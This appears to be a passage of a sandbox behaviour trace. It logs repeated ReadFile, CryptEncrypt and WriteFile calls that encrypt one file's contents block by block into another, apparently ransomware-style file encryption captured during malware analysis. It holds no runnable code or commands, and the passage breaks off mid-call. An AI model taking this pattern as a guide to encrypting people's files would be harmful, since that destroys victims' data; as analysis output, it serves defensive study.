ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.520] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.520] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.520] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.520] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.520] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.520] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.520] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.520] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.520] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.520] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.520] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.522] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.522] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.522] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.522] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.522] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.522] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.522] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.523] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.523] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.523] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.523] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.523] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.523] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.523] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.523] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.523] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.523] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.523] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.523] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.523] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.523] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.524] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.524] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.524] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.524] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.524] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.524] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.524] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.524] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.524] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.524] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.524] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.524] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.524] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.525] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.525] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.525] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.525] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.525] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.525] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.525] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.525] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.525] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.525] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.525] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.525] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.525] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.525] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.526] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.526] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.526] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.526] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.526] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.526] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.526] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.526] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.526] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.526] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.526] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.526] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.526] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.527] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.527] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.527] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.527] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.527] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.527] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.527] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.527] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.527] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.527] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.527] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.527] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.527] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.527] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.528] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.528] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.528] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.528] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.528] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.528] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.528] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.528] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.528] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.528] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.528] CryptEncrypt (in: hKey=0x2fb688, 